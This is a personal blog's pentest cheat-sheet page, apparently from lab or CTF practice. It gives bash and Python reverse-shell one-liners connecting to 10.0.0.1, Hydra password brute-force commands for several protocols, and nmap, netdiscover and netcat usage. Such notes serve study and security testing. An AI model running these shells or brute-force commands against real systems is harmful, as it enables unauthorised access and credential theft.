Tikejhya: Ashish Nepal

Knowledgebase

Month: April 2019

reverse shell

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
You have already voted.

steganography & exiftool

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Using steganography, secret messages can be embedded into images.

using exiftool to discover a base64 encoded message on the image metadata

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg

You have already voted.

hydra [by example]

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols to attack.

 

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form “/path/index.php:key=^PASS^:invalid key” -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

quick tip: you may want to send two keys:; user=^USER^&pass=^PASS^:Bad login”
Host =172.28.128.5
Method = http-form-post
URL =/path/index.php
Form parameters =key=^PASS^
Failure response =invalid key
Users file = users.txt
Password file =/usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt

You have already voted.

nmap

nmap -p- -Pn -n 172.28.128.3

-p-: you can specify -p- to scan ports from 1 through 65535.

-Pn: Treat all hosts as online — skip host discovery

-n/-R: Never do DNS resolution/Always resolve [default: sometimes]

 

nmap -sV -T4 -p-65535 172.28.128.3

Adding the -sV option enables Nmap version detection, which is trained to look for these clues (among others).

-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports and -T5 caps that value at 5 ms.

-p-65535: scan all ports to 65535

Reference to values for T: T Table

You have already voted.

netdiscover

Netdiscover is a simple ARP scanner which can be used to scan for live hosts in a network.

Discover your network interface eth0 for range of 172.28.128.0/24::
netdiscover -i eth0 -r 172.28.128.0/24-i device: your network device

 

Options available:

  -r range: scan a given range instead of auto scan. 172.28.128.0/24,/16,/8
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp reques (for nets with packet loss)
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time supression betwen each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -N Do not print header. Only valid when -P is enabled.
  -L in parsable output mode (-P), continue listening after the active scan is completed

You have already voted.

Netcat

Netcat test open port

nc -zv 192.168.1.15 22

In the command above, the flag:

  1. -z – sets nc to simply scan for listening daemons, without actually sending any data to them.
  2. -v – enables verbose mode.

Passing -u you can test udp port.

Using Netcat for File Transfers

Receiver

nc -l -p 3334 > file

will begin listening on port 3334.

Sender

nc -w 3 [IP_of_destination] 3334 < file

Compression can be used too

Reciver

nc -l -p 3334 | uncompress -c | tar xvfp -

Sender

tar cfp - /some/dir | compress -c | nc -w 3 [IP_of_destination] 3334
You have already voted.

Powered by WordPress & Theme by Anders Norén